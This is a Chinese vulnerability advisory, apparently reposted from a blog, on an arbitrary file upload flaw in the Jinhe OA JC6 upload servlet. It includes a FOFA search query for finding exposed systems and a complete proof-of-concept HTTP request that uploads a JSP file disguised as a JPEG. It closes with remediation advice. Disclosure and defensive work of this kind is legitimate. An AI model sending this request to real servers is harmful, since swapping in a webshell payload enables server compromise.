金和OA jc6/servlet/Upload接口任意文件上传

发布时间:2024年01月16日

声明
本文仅用于技术交流,请勿用于非法用途
由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任

一、产品简介

金和数字化智能办公平台(简称JC6)是一款结合了人工智能技术的数字化办公平台,为企业带来了智能化的办公体验和全面的数字化转型支持。同时符合国家信创认证标准,支持组织数字化转型,实现业务流程的数字化、智能化和协同化,提高企业竞争力。

金和JC6基于J2EE和SOA体系架构,支持微服务架构。它提供标准化的数据规范和API接口,支持多种部署方式,如集团化应用、多维度的权限管理、大规模用户以及集群式部署等。此外,它可以适应不同企业的需求和技术环境,帮助企业实现数字化转型并提升竞争力。

二、漏洞描述

金和OA jc6/servlet/Upload接口存在任意文件上传漏洞。攻击者可以构造木马上传服务器,严重危害公司的利益。

三、fofa查询语句

app="金和网络-金和OA"||body="/jc6/platform/sys/login"

四、漏洞复现

poc

POST /jc6/servlet/Upload?officeSaveFlag=0&dbimg=false&path=&setpath=/upload/ HTTP/1.1
Host: 
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Length: 197
Content-Type: multipart/form-data; boundary=ee055230808ca4602e92d0b7c4ecc63d

--ee055230808ca4602e92d0b7c4ecc63d
Content-Disposition: form-data; name="img"; filename="1.jsp"
Content-Type: image/jpeg

<% out.println("success!!"); %>
--ee055230808ca4602e92d0b7c4ecc63d--

拼接上传路径 http://xxxxxxx/jc6/upload/297e80808000da78018d113cc6d60138.jsp

五、修复建议

  1. 更新和修补:确保金和OA jc6版本是最新的,并安装官方发布的已知漏洞修复补丁。跟踪厂商的安全公告,及时更新软件以修复任何已知的漏洞。

  2. 访问控制:限制jc6/servlet/Upload接口的访问权限,例如通过访问控制列表 (ACL) 或者防火墙规则,只允许来自受信任的IP地址或特定的网络范围访问该接口。

  3. 文件类型验证和过滤:在接收文件上传之前,进行严格的文件类型验证和过滤,确保只允许上传被允许的文件类型。可以使用文件的扩展名、MIME类型或者魔术数字签名等方式进行验证和过滤。

  4. 文件名随机化和限制上传目录:对上传的文件进行随机化的文件名处理,确保文件名不可预测。同时,限制上传的文件只能保存在安全的目录或特定目录结构下,防止上传到敏感目录中。

  5. 文件权限设置:确保上传的文件权限被配置成最小限制,仅具备必要的读取或执行权限,并且不允许任意用户访问或执行上传的文件。

  6. 强制访问控制:在服务器端对上传的文件进行强制的访问控制,禁止直接通过文件名访问上传的文件,只允许通过安全的接口或逻辑来访问这些文件。

  7. 安全审计和监控:实施安全审计和监控措施,记录对上传接口的访问并监测上传文件的行为。及时检测和响应异常或恶意的文件上传行为。

文章来源:https://blog.csdn.net/qq_56698744/article/details/135626302
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。